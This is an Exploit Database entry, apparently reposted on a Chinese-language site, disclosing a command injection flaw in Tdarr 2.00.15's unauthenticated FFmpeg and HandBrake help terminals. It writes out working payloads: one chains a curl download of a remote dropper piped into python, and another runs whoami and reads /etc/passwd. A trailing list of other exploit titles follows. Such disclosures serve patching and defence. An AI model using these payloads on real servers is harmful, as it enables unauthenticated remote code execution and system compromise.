Tdarr 2.00.15 – Command Injection

Exploit Database
106 阅读

作者： Sam Smith

日期： 2022-03-11
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/50822/

# Exploit Title: Tdarr 2.00.15 - Command Injection
# Date: 10/03/2022
# Exploit Author: Sam Smith
# Vendor Homepage: https://tdarr.io
# Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip
# Version: 2.00.15 (likely also older versions)
# Tested on: 2.00.15

Exploit:

The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell.

eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`.

Tdarr is not protected by any auth by default and no credentials are required to trigger RCE

last Exploits
Tdarr 2.00.15 – Command Injection的更多信息

D-Link DCS – ‘security.cgi’ Cross-Site Request Forgery：
WDMyCloud < 2.30.165 - Multiple Vulnerabilities：
HP Digital Imaging – ‘hpodio08.dll’ Insecure Method：
Barracuda Control Center 620 – Cross-Site Scripting / HTML Injection：
Oracle Database Client System Analyzer – Arbitrary File Upload (Metasploit)：
Wireshark 1.4.3 – ‘.pcap’ Memory Corruption：
X7 Chat 2.0.5 – ‘message.php’ PHP Code Execution (Metasploit)：
MySQLDriverCS 4.0.1 – SQL Injection：